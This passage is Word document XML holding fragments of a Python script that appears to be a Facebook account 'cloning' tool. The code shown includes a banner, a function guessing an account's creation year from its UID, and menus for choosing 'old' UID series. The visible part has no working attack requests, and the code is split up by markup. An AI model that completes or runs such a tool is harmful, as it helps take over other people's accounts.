      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>latest_patch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} Safari/537.36”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641EBDC3" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>([A, B, C, D])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A62DB14" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B3DB3" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFAAEAE" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# Set window title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0C1AF5" w14:textId="2696B58E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.stdout.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘\x1b]2;𓆩</w:t>
      </w:r>
      <w:r>
        <w:t>【</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W W 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51"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>👑</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>】</w:t>
      </w:r>
      <w:r>
        <w:t>𓆪 \x07’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73095D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3AFEE4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04513CF6" w14:textId="0DF61A34" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    # WWK Clover Logo – Green – Version 2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C4B76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____banner____():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7607BA24" w14:textId="39E30FA6" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    if ‘win’ in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.platform</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217CF3D6" w14:textId="2A29F859" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cls’</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A31CDA" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996B54D" w14:textId="27831170" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘clear’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B65092" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3DC5C8" w14:textId="05BF0A63" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(“””\033[1;32m</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D97435" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4BD3F7" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎               ░█████╗░  ██╗░░██╗  ██████╗░</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FAC35" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎               ██╔══██╗  ██║░░██║  ██╔══██╗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4E593B" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎               ███████║  ███████║  ██████╦╝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1D618" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎               ██╔══██║  ██╔══██║  ██╔══██╗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F3042" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎               ██║░░██║  ██║░░██║  ██████╦╝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B3024" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎               ╚═╝░░╚═╝  ╚═╝░░╚═╝  ╚═════╝░</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E29897" w14:textId="32D6C038" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎\033[0m”””)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004A595" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D511EF8" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1DE1C5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creationyear</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416AF598" w14:textId="19F90A58" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C9672" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Estimates the Facebook account creation year based on the UID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E045F2A" w14:textId="1EEC57E0" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C3C099" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) == 15:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C08E77" w14:textId="297CA1FA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(‘1000000000’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E263FC0" w14:textId="3B00D186" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2009’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C687E65" w14:textId="51987207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(‘100000000’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC5B3C5" w14:textId="7765B69E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2009’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8E668F" w14:textId="486D75F3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(‘10000000’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58013531" w14:textId="146A0AE3" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2009’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41629050" w14:textId="7CD5F037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((‘1000000’, ‘1000001’, ‘1000002’, ‘1000003’, ‘1000004’, ‘1000005’)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D471C09" w14:textId="3D2CD0BB" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2009’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0B7058" w14:textId="62061C9C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((‘1000006’, ‘1000007’, ‘1000008’, ‘1000009’)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE1A92C" w14:textId="6DC5B981" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2010’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6523E894" w14:textId="3D2670BF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(‘100001’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9E6FAD" w14:textId="1EFC0FF2" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2010’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F07A1" w14:textId="1D65AF50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((‘100002’, ‘100003’)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514485C7" w14:textId="2CFF67EF" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2011’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCCF869" w14:textId="406B3E5B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(‘100004’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E62BB2B" w14:textId="2795D0FD" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2012’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB35775" w14:textId="6131A4CE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((‘100005’, ‘100006’)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F007D" w14:textId="498CB40C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2013’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1132A536" w14:textId="28654E23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((‘100007’, ‘100008’)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF8CE60" w14:textId="003C5F9F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2014’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1216D7" w14:textId="1F159E5E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(‘100009’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7302E109" w14:textId="3D1C5F4B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2015’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5080198B" w14:textId="3B1A8315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(‘10001’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D60CC53" w14:textId="23BB385D" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2016’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B7C65" w14:textId="02489D2F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(‘10002’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33300C47" w14:textId="53531396" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2017’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553D49C" w14:textId="1F7BF0C7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(‘10003’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C105631" w14:textId="4D821955" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2018’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C75064" w14:textId="72EEADB6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(‘10004’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E640E2E" w14:textId="72D6D078" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2019’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80CC3B" w14:textId="3E9B65E7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(‘10005’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B27E541" w14:textId="788B6EDF" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2020’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14929ECC" w14:textId="65706E70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(‘10006’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E2A3B7" w14:textId="2DDEE638" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2021’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAF98BF" w14:textId="1848252F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(‘10009’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67839520" w14:textId="5F05F77E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2023’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFCE03D" w14:textId="32E8BC97" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid.startswith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>((‘10007’, ‘10008’)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2933686A" w14:textId="0F30D18F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            return ‘2022’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343985B2" w14:textId="3DE3A13E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        return ‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCAD9AE" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎  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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) in (9, 10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0D9DCA" w14:textId="6CECF61E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        return ‘2008’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476AFCFD" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎  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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) == 8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E784EFF" w14:textId="748433CC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        return ‘2007’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B8BB8" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎  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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) == 7:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ABC7B7" w14:textId="5334A100" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        return ‘2006’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1719A853" w14:textId="0667D195" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎  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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) == 14 and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid.startswith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘61’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B40C2" w14:textId="440C3082" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        return ‘2024’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD02CB1" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564F5073" w14:textId="4D11A9E4" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        return ‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE36ED" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711DF231" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E148AC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clear():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ADC686" w14:textId="2D9674F5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘clear’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5ECEE" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227F2FAB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0454785C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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A0E9B" w14:textId="6A0A5BE3" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘\x1b[38;5;48m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F1817" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BC04A5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B0310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BNG_71_():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76813D79" w14:textId="1DD96DA3" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572041CB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Main menu function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88E5BC" w14:textId="60A8EB6C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE220BC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070E920F" w14:textId="5607BE09" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mA\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mOLD CLONE’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5506010C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6262FAA8" w14:textId="636C260C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    __Jihad__ = input(f”       \x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;41mCHOICE  {W}: {Y}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36DBF2" w14:textId="15DE380C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    if __Jihad__ in (‘A’, ‘a’, ‘01’, ‘1’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A08F61" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>old_clone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA96C7C" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB38845" w14:textId="715C059B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(f”\n    {rad}Choose Valid Option… “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F93E4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3859369E" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        BNG_71_()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51912C5B" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495F7A8C" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED1E61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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>old_clone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B3610F" w14:textId="645E8F3B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F2CA2" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Menu for selecting old account cloning type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227FEE76" w14:textId="0CCB20FE" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EBF3C5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F38A4F" w14:textId="44CB9A18" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mA\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;49mALL SERIES’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180DC5F4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636FDF88" w14:textId="45F86CC5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mB\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;49m100003/4 SERIES’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF3F98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7097863A" w14:textId="7358926F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mC\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;49m2009 series’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00056160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69754E8E" w14:textId="37CA0ABA" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    _input = input(f”       \x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;41mCHOICE  {W}: {Y}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54537DA5" w14:textId="67A970A3" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    if _input in (‘A’, ‘a’, ‘01’, ‘1’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22080566" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>old_One</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C3E775" w14:textId="08FB4E87" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> _input in (‘B’, ‘b’, ‘02’, ‘2’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E933F54" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>old_Tow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F172D2" w14:textId="7981741E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> _input in (‘C’, ‘c’, ‘03’, ‘3’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CEE57D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>old_Tree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46C859" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880D34C" w14:textId="080E19D7" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(f”\n[×]{rad} Choose Value Option… “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31370A10" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        BNG_71_()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789E088" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
